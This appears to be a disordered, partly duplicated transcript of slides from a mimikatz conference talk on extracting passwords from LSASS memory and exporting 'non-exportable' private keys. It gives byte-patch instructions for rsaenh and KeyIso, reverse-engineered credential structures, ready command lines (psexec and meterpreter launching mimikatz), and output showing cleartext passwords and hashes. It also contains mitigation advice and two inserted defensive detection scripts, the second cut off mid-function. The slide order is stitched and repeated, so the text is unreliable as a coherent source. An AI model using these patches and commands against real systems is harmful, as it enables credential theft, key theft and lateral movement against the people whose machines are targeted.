.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp   continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time

Import, export, import as not exportable… export!

(slide 44)
mimikatz crypto patchcapi limitations

Because:
 – I'm lazy
 – I've seen, in the majority of cases, RSA keys for real-life use
   • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with:
 – Microsoft Base Cryptographic Provider v1.0
 – Microsoft Enhanced Cryptographic Provider v1.0
 – Microsoft Enhanced RSA and AES Cryptographic Provider
 – Microsoft RSA SChannel Cryptographic Provider
 – Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll

(slide 45)
mimikatz crypto cng how it works

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”

This time, key operations are not made in the “user” process context.
Processes use RPC to call “Key isolation service” (keyiso) functions.

It seems more secure than CryptoAPI…
 – It is, but it's not perfect…

(slide 46)
mimikatz crypto cng how it's exported ( level)

KeyIso Service (LSASS Process)

(slide 47)

[Diagram: a process asks CNG to export a key; the request goes over RPC to the KeyIso service inside LSASS (NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), which loads the private key (DPAPI decode) and checks the export flag: exportable = yes → Exported Key; no → NTE_NOT_SUPPORTED. Labels on the slide: Process, CNG, RPC, Load Private Key, Ask to export Key, Exported Key, PLAYSKOOL]
mimikatz crypto patchcng because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) : ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

(slide 48)

mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.

(callout: Exportable)
mimikatz crypto patchcng because sometimes I own LSASS

This time, checks and keys are in the LSASS process… And what?

I wrote “1” byte in LSASS memory space…

(slide 49)

.text:6C815210 75 1C    jnz   short continue_key_export
.text:6C815210 EB 1C    jmp   short continue_key_export
mimikatz crypto patchcng demo time

Import, export, import as not exportable… export again!

(slide 50)
mimikatz crypto patchcng limitations

Patch operation needs some privileges:
 – Admin (debug privilege)
 – SYSTEM

mimikatz crypto::patchcng only deals with:
 – Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
 – certutil can…

(slide 51)
mimikatz crypto patchcng bonus

After one admin patched LSASS, all users of the current system benefit from the extra exports
 – until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
 – Yeah, like the good old certutil

(slide 52)

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil : -exportPFX La commande s'est terminée correctement.
mimikatz crypto memo

Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
 – PFX files are protected by this password: mimikatz

Keys
 – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
 – When you delete a certificate, Windows does not delete its private key… funny, isn't it?
   • So yes, mimikatz can export it

(slide 53)
mimikatz crypto what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts/computer
 – no admin, no admin, no admin…

Basics
 – Use smartcards/tokens for user certificates
 – Use Hardware Security Modules (HSM), even SoftHSM

More in depth
 – See what Microsoft can do with TPM from Windows 8
   • Virtual SmartCard seems promising
 – Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
   • Their biometrics stuff was a little buggy ;)

(slide 54)
mimikatz what else can it do

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
 – Play with tokens & privileges
 – Display SSDT x86 & x64
 – List minifilters actions
 – List Notifications (process, thread, image, registry)
 – List Objects hooks and procedures
 – …
…

(slide 55)
mimikatz that's all folks

Thanks to / Merci à
 – my girlfriend for her support (her LSASS crashed a few times)
 – Application Security Forum for offering me this great opportunity
   • Partners and Sponsors, for sure
 – Microsoft for always considering it as normal/acceptable
 – Security friends/community for their ideas & challenges
   • nagual, newsoft, mubix, …
 – You, for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number

(slide 56)
Blog, Source Code & Contact

blog     http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source   https://code.google.com/p/mimikatz
email    benjamin@gentilkiwi.com

(slide 57)
mimikatz sekurlsa wdigest demo time

sekurlsa::wdigest

(slide 21)
mimikatz sekurlsa livessp

because Microsoft was too good in closed networks

(slide 22)
mimikatz sekurlsa livessp how

Actually, I've only used a logical (empirical) approach to search passwords…
 – Protocol reading
 – Symbols searching
~ Boring ~… be more brutal this time: make a WinDBG trap

(slide 23)

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz sekurlsa livessp how

Let's log in with a Live account on Windows 8

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

(slide 24)

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider
Yeah, Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow

(slide 25)

[Workflow: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
	DWORD isSupp;
	DWORD unk0;
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
	struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
	struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
	DWORD unk4;
	DWORD unk5;
	PVOID unk6;
	LUID LocallyUniqueIdentifier;
	LSA_UNICODE_STRING UserName;
	PVOID unk7;
	PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?

(slide 26)

Me: yes
mimikatz sekurlsa kerberos

Let's log in with a normal account

After credentials protection, KerbCreateLogonSession calls:
 – NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
 – NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

(slide 27)

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz sekurlsa kerberos (nt6) workflow

(slide 28)

[Workflow: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa kerberos (nt5) workflow

(slide 29)

[Workflow: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	/* […] */
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa demo time

Final sekurlsa demo: sekurlsa::logonPasswords full

(slide 30)
mimikatz sekurlsa kerberos “hu?”

Ok, it works…
But why?
Not at all logons on NT5 (can need an unlock)

From my understanding of Microsoft explanations:
 – no need of passwords for the Kerberos protocol…
 – all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
 – For password auth
   • password hash for the shared secret, but keeping the password in memory
 – For full smartcard auth
   • No password on client
   • No hash on client
     – NTLM hash on client…
     – the KDC sent it back as a gift

(slide 31)
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take benefit of its keys when we called it
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and “imports” the keys that LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS

(slide 32)
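Both modes described on this slide, injecting a DLL into LSASS and reading LSASS memory from outside, start with the same observable step: a handle to lsass.exe with specific access rights. Sysmon Event ID 10 (ProcessAccess) records exactly that handle, with the source image and the granted access mask. The following detector is an added example for this transcript, not code from the slides or from mimikatz; the Sysmon records, the tool path and the allow-list of legitimate source images are constructed placeholders to be tuned per environment.

```python
"""Flag handle access to lsass.exe that matches the two sekurlsa modes on the slide
(DLL injection into LSASS, or plain reading of its memory) from Sysmon Event ID 10
(ProcessAccess) records. Added example for this transcript, not mimikatz code. The
records and the allow-list below are constructed placeholders."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Process access rights (winnt.h)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Injecting a DLL needs to write memory and start a remote thread;
# reading LSASS memory from outside only needs VM_READ.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed allow-list of source images that legitimately open lsass.exe; tune per environment.
DEFAULT_ALLOWLIST = frozenset({
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
})


@dataclass(frozen=True)
class Finding:
    source_image: str
    granted_access: int
    reason: str


def classify_access(granted_access: int) -> Optional[str]:
    """Name the sekurlsa-like access pattern a granted access mask allows, if any."""
    if granted_access & INJECT_MASK == INJECT_MASK:
        return "injection-capable access (CREATE_THREAD|VM_OPERATION|VM_WRITE)"
    if granted_access & PROCESS_VM_READ:
        return "memory read access (VM_READ)"
    return None


def analyze_events(events: Iterable[dict], allowlist=DEFAULT_ALLOWLIST) -> List[Finding]:
    """One Finding per Sysmon Event 10 record in which a non-allow-listed process
    obtained read- or injection-capable access to lsass.exe."""
    findings: List[Finding] = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        source = ev["SourceImage"].lower()
        if source in allowlist:
            continue
        granted = int(ev["GrantedAccess"], 16)  # Sysmon logs the mask as a hex string, e.g. "0x1010"
        reason = classify_access(granted)
        if reason is not None:
            findings.append(Finding(ev["SourceImage"], granted, reason))
    return findings


# Constructed Sysmon records (field names as Sysmon emits them; values made up).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\Gentil Kiwi\Desktop\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Users\Gentil Kiwi\Desktop\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x143a"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\Gentil Kiwi\Desktop\tool.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 1, "SourceImage": r"C:\Users\Gentil Kiwi\Desktop\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f.source_image} -> lsass.exe 0x{f.granted_access:x}: {f.reason}")
```

On the constructed records, the two tool.exe events are reported (one as memory read, one as injection-capable), the csrss.exe handle is allow-listed, the 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) handle is ignored, and the non-lsass and non-Event-10 records are skipped. The allow-list is the part that needs real baselining: EDR agents and some management tools open lsass.exe with VM_READ legitimately.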
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx

Key material (diagram): in the lsass process, lsasrv holds g_cbRandomKey (DWORD, 256) and g_pRandomKey → BYTE[g_cbRandomKey] for RC4, and g_pDESXKey → BYTE[144] plus g_Feedback BYTE[8] for DESx. mimikatz loads its own copy of lsasrv and copies these keys out of the lsass process…

(slide 33)
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES

Key material (diagram): in the lsass process, lsasrv holds InitializationVector BYTE[16] and the BCrypt key handles h3DesKey and hAesKey; each handle points to a KIWI_BCRYPT_KEY whose `cle` member points to the KIWI_BCRYPT_KEY_DATA holding the key bytes. mimikatz copies these out of the lsass process…

    /* BCrypt key object behind lsasrv!h3DesKey / lsasrv!hAesKey; layout reverse-engineered, unkN fields not identified */
    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data; /* etc.: the key bytes follow */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle; /* "cle" = key */
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

(slide 34)
mimikatz :: sekurlsa :: memo

Security Packages

    Package          Symbols                               Type
    tspkg            tspkg!TSGlobalCredTable               RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                 LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList    LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList         LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable  RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList               LIST_ENTRY
                     lsasrv!LogonSessionListCount          ULONG

Protection Keys

    Key     NT 5 Symbols
    RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key     NT 6 Symbols
    (IV)    lsasrv!InitializationVector
    3DES    lsasrv!h3DesKey
    AES     lsasrv!hAesKey

(slide 35)
mimikatz :: sekurlsa :: memo

Some commands:

    mimikatz privilege::debug sekurlsa::logonPasswords full exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Sample output (French build, as on the slide):

    mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
    // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full

    Authentification Id        : 0;234870
    Package d'authentification : NTLM
    Utilisateur principal      : Gentil Kiwi
    Domaine d'authentification : vm-w8-rp-x
            msv1_0 :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
             * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
            kerberos :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            wdigest :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            tspkg :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            livessp :
             * n.t. (LUID KO)

(slide 36)
mimikatz :: sekurlsa :: what we can do

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless)
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public / Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?

(slide 37)
mimikatz :: crypto :: what is it?

A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates / keys
  • Even those which are “not” exportable

What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again)

(module: mod_mimikatz_crypto)

(slide 38)
mimikatz :: crypto :: how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer / User can load their own keys because they have enough secrets to do it (e.g. session opened)
– Yes, a computer / server opens a “session”
Export / Usage can be limited by
– Password
– Popup
  (Password and Popup: a constraint for most users; unavailable for computer keys)
– Export / Archive flag not present

    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

(slide 39)
mimikatz :: crypto :: capi :: how it works

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your-apps-here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…

(slide 40)
mimikatz :: crypto :: capi :: how it's exported ( level)

Export flow (diagram): Process → CryptoAPI and RSA CSP → Load Private Key → DPAPI Decode → Ask to export Key → Exportable? → yes: Exported Key / no: NTE_BAD_KEY_STATE (diagram label: “PLAYSKOOL”)

(slide 41)
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable

Output on a “not exportable” key (mimikatz, then certutil; French build, as on the slide):

    mimikatz # crypto::exportCertificates
    Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
      - Benjamin Delpy
            Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
            Provider       : Microsoft Enhanced Cryptographic Provider v1.0
            Type           : AT_KEYEXCHANGE
            Exportabilité  : NON
            Taille clé     : 2048
            Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
            Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

    ================ Certificat 0 ================
    Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
    Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Objet : CN=Benjamin Delpy, C=FR
    Il ne s'agit pas d'un certificat racine
    Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
      Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
    La clé privée NE PEUT PAS être exportée
    Succès du test de cryptage
    CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

(slide 42)
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote “4” bytes in my memory space:

    ; original
    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz   continue_key_export_or_archive
    ; patched
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp   continue_key_export_or_archive

    ; original
    .text:0AC1F749 0F 85 B6 3B FF FF    jnz   continue_key_export_or_archive_prepare
    ; patched
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp   continue_key_export_or_archive_prepare

(slide 43)
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export

(slide 44)
mimikatz :: crypto :: patchcapi :: limitations

Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real life use
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll

(slide 45)
mimikatz :: crypto :: cng :: how it works

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”

This time, key operations are not made in the “user” process context
Processes use RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI… – It is, but it's not perfect…

(slide 46)
mimikatz :: crypto :: cng :: how it's exported ( level)

Export flow (diagram): Process → CNG → RPC → KeyIso Service (LSASS process) → Load Private Key → DPAPI Decode → Ask to export Key → Exportable? → yes: Exported Key / no: NTE_NOT_SUPPORTED (diagram label: “PLAYSKOOL”)
NT6: system protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)

(slide 47)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable

Output on a “not exportable” CNG key (French build, as on the slide):

    mimikatz # crypto::exportKeys [user]
    Clés CNG :
      - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
            Exportabilité  : NON
            Taille clé     : 2048
            Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
            mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.

(slide 48)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time, checks and keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…

    ; original
    .text:6C815210 75 1C    jnz   short continue_key_export
    ; patched
    .text:6C815210 EB 1C    jmp   short continue_key_export

(slide 49)
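Both patches shown on the slides (the 4-byte one in rsaenh on slide 43 and the 1-byte one in the KeyIso service on slide 49) have the same shape: a conditional jump over the "not exportable" check is rewritten so that it is always taken, and the displacement bytes are left untouched. That leaves a byte-level difference between the module's code as loaded and the same bytes in the file on disk, which is what a memory-forensics tool looks for when it verifies loaded images. The routine below is an added example for this transcript, not code from the slides or from mimikatz: it diffs two byte buffers covering the same code range and names the two patch shapes. The buffers are constructed; only the three jnz instructions come from the slides, the filler bytes are made up, and the offsets are buffer-relative rather than real rsaenh.dll or ncrypt.dll addresses.

```python
"""Spot in-memory code patches of the shape shown on slides 43 and 49 by diffing a
module's loaded code bytes against the same range read from its file on disk. Added
example for this transcript, not mimikatz code. The buffers are constructed: the jnz
opcodes quoted on the slides sit between made-up filler bytes, and offsets are
buffer-relative, not real rsaenh.dll / ncrypt.dll addresses."""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Patch:
    offset: int          # offset of the first changed byte
    original: bytes      # changed bytes as on disk
    patched: bytes       # changed bytes as in memory
    description: str


def describe(original: bytes, patched: bytes) -> str:
    """Recognise the two patch shapes from the slides in a window starting at the change."""
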